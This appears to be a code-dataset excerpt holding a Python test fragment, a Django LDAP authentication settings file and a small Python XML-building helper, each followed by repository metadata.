"else:\n print 'ELSE'")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "ELSE\n")
|
apache-2.0
| -2,884,884,697,422,707,000
| 40.96875
| 58
| 0.590966
| false
| 3.518777
| true
| false
| false
|
kingsdigitallab/kdl-django
|
ddhldap/settings.py
|
1
|
1609
|
# -----------------------------------------------------------------------------
# http://pythonhosted.org/django-auth-ldap/
# -----------------------------------------------------------------------------
from django_auth_ldap.config import LDAPSearch, PosixGroupType
import ldap
LDAP_BASE_DC = 'dc=dighum,dc=kcl,dc=ac,dc=uk'
LDAP_BASE_OU = 'ou=groups,' + LDAP_BASE_DC
# Baseline configuration
AUTH_LDAP_SERVER_URI = 'ldap://ldap1.cch.kcl.ac.uk'
AUTH_LDAP_BIND_DN = ''
AUTH_LDAP_BIND_PASSWORD = ''
AUTH_LDAP_USER_DN_TEMPLATE = 'uid=%(user)s,ou=people,' + LDAP_BASE_DC
# Set up the basic group parameters
AUTH_LDAP_GROUP_SEARCH = LDAPSearch(
LDAP_BASE_OU,
ldap.SCOPE_SUBTREE,
'(objectClass=posixGroup)'
)
AUTH_LDAP_GROUP_TYPE = PosixGroupType(name_attr='cn')
# Simple group restrictions
# TODO: Set this value in the project settings
AUTH_LDAP_REQUIRE_GROUP = ''
# Populate the Django user from the LDAP directory
AUTH_LDAP_USER_ATTR_MAP = {
'first_name': 'givenName',
'last_name': 'sn',
'email': 'mail'
}
AUTH_LDAP_USER_FLAGS_BY_GROUP = {
'is_active': 'cn=confluence-users,' + LDAP_BASE_OU,
'is_staff': 'cn=kdl-staff,' + LDAP_BASE_OU,
'is_superuser': 'cn=sysadmin,' + LDAP_BASE_OU
}
AUTH_LDAP_PROFILE_FLAGS_BY_GROUP = {}
# This is the default, but I like to be explicit
AUTH_LDAP_ALWAYS_UPDATE_USER = True
# Cache group memberships for an hour to minimize LDAP traffic
AUTH_LDAP_CACHE_GROUPS = True
AUTH_LDAP_GROUP_CACHE_TIMEOUT = 60 * 60
AUTHENTICATION_BACKENDS = (
'django_auth_ldap.backend.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
|
mit
| 6,093,891,807,804,528,000
| 28.254545
| 79
| 0.632691
| false
| 3.19246
| false
| false
| false
|
jperla/webify
|
webify/templates/helpers/xml.py
|
1
|
1061
|
__no_content = object()
def node(element_name, content=__no_content, attributes={}):
attrs_string = _attrs_string(attributes)
if content == __no_content:
return node_block(element_name, attributes)
else:
return node_inline(element_name, content, attributes)
def _attrs_string(attributes):
attrs = u' '.join(['%s="%s"' % (k,v) for k,v in attributes.iteritems()])
attrs_string = (u' ' + attrs) if len(attrs) > 0 else u''
return attrs_string
def node_inline(element_name, content, attributes={}):
attrs_string = _attrs_string(attributes)
if content == u'':
return u'<%s%s />' % (element_name, attrs_string)
else:
return u'<%s%s>%s</%s>\n' % (element_name, attrs_string, content, element_name)
def node_block(element_name, attributes={}):
attrs_string = _attrs_string(attributes)
return u'<%s%s>\n' % (element_name, attrs_string), u'</%s>\n' % element_name
def cdata(content):
return u'<![CDATA[>%s\n]]>' % content
def cdata_block():
return u'<![CDATA[>', u'\n]]>'
|
mit
| -1,484,670,680,213,760,300
| 33.225806
| 87
| 0.613572
| false
| 3.234756
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.